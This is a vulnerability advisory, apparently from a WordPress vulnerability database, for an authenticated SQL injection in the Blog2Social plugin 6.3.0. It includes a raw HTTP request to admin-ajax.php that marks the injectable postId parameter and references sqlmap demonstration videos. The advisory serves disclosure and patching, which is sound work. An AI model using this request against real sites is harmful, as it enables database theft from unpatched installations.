Blog2Social: Social Media Auto Post & Scheduler < 6.3.1 - Authenticated SQL Injection



Description
SQL Injection in the Blog2Social plugin 6.3.0 for WordPress exists via Re-Share Posts feature.
Proof of Concept
Please refer to the video below for steps to reproduce and demonstration of automatic exploit with sqlmap.

- Mega.nz: https://mega.nz/file/mt1gFYTK#e3XkA-zY0cCApTYlLZktRZ4Q4vchVhbPsNqQC6CKORo
- Drive: https://drive.google.com/file/d/1-KP_j7Ke4LbdvNi2sTIVpkiu3NcFENPN/view?usp=sharing


Payload:
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=blog2social-repost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 70
Origin: http://example.com
DNT: 1
Connection: close
Cookie: wordpress_28367124e365cebea6bbf69dfaa9f31b=author1%7C1590633495%7C5Yy7rTkEQl35520rsnZ7xxDTqB742szKwX4RbO5Sh3b%7Ccb6e4516c091f556a9aa62007079d0186b96e19aeacb9a3e16c32b9d472adc23; PHPSESSID=sie1r62oh0f61k0fhg8fqqbf5p; wordpress_test_cookie=WP+Cookie+check; pmpro_visit=1; wordpress_logged_in_28367124e365cebea6bbf69dfaa9f31b=author1%7C1590633495%7C5Yy7rTkEQl35520rsnZ7xxDTqB742szKwX4RbO5Sh3b%7C29ad269c08cf55f201b09941e94d00a8d6e6d41613d434b7ff73bf8fcc6e303f; wp-settings-2=editor%3Dhtml; wp-settings-time-2=1590460695

action=b2s_delete_re_post_sched&postId=INJECT_HERE&b2s_security_nonce=1ee6f55c64
```

Affects Plugin

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter Nguyen Anh Tien
Submitter Website https://research.sun-asterisk.com/
Submitter Twitter https://twitter.com/vigov5
Views 856
Verified No
WPVDB ID 10260

Timeline

Publicly Published 2020-05-29 (about 1 month ago)
Added 2020-06-09 (29 days ago)
Last Updated 2020-06-09 (29 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin